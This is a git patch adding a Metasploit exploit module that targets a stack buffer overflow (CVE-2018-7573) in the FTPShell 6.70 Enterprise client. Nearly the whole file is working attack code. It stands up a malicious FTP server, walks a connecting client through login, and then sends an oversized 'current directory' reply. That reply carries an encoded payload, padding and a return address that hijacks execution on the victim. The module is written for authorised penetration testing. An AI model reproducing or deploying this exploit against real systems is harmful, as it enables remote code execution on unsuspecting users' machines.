From 4a4e38a7b0422a553973dfea9a3ef98cfb353b5d Mon Sep 17 00:00:00 2001 From: Daniel Teixeira Date: Wed, 27 Jun 2018 16:37:22 +0100 Subject: [PATCH] FTPShell client 6.70 (Enterprise edition) --- .../exploits/windows/ftp/ftpshell_cli_bof.rb | 107 ++++++++++++++++++ 1 file changed, 107 insertions(+) create mode 100644 modules/exploits/windows/ftp/ftpshell_cli_bof.rb diff --git a/modules/exploits/windows/ftp/ftpshell_cli_bof.rb b/modules/exploits/windows/ftp/ftpshell_cli_bof.rb new file mode 100644 index 0000000000..cbb30da4ac --- /dev/null +++ b/modules/exploits/windows/ftp/ftpshell_cli_bof.rb @@ -0,0 +1,107 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::TcpServer + include Msf::Exploit::Seh + include Msf::Exploit::Remote::Egghunter + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise edition) allowing remote + code execution. + }, + 'Author' => + [ + 'r4wd3r', # Original exploit author + 'Daniel Teixeira ' # MSF module author + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', 'CVE-2018-7573'], + [ 'EDB', '44596' ] + ], + 'Payload' => + { + 'Space' => 400, + 'BadChars' => "\x00\x22\x0d\x0a\x0b" + }, + 'Platform' => 'win', + 'Targets' => + [ + # CALL ESI in FTPShell.exe : 0x00452eed + [ 'Windows Universal', {'Ret' => "\xed\x2e\x45" } ] + ], + 'Privileged' => false, + 'DefaultOptions' => + { + 'SRVHOST' => '0.0.0.0', + 'EXITFUNC' => 'thread' + }, + 'DisclosureDate' => 'May 15 2017', + 'DefaultTarget' => 0)) + + register_options( + [ + OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]) + ]) + end + + def exploit + srv_ip_for_client = datastore['SRVHOST'] + if srv_ip_for_client == '0.0.0.0' + if datastore['LHOST'] + srv_ip_for_client = datastore['LHOST'] + else + srv_ip_for_client = Rex::Socket.source_address('50.50.50.50') + end + end + + srv_port = datastore['SRVPORT'] + + print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}") + super + end + + def on_client_connect(client) + return if ((p = regenerate_payload(client)) == nil) + print_status("#{client.peerhost} - connected.") + + res = client.get_once.to_s.strip + print_status("#{client.peerhost} - Request: #{res}") unless res.empty? + print_status("#{client.peerhost} - Response: Sending 220 Welcome") + welcome = "220 Welcome.\r\n" + client.put(welcome) + + res = client.get_once.to_s.strip + print_status("#{client.peerhost} - Request: #{res}") + print_status("#{client.peerhost} - Response: sending 331 OK") + user = "331 OK.\r\n" + client.put(user) + + res = client.get_once.to_s.strip + print_status("#{client.peerhost} - Request: #{res}") + print_status("#{client.peerhost} - Response: Sending 230 OK") + pass = "230 OK.\r\n" + client.put(pass) + res = client.get_once.to_s.strip + print_status("#{client.peerhost} - Request: #{res}") + + sploit = "220 \"" + sploit << payload.encoded + sploit << "\x20"*(400-payload.encoded.length) + sploit << target.ret + sploit << "\" is current directory\r\n" + + print_status("#{client.peerhost} - Request: Sending the malicious response") + client.put(sploit) + + end +end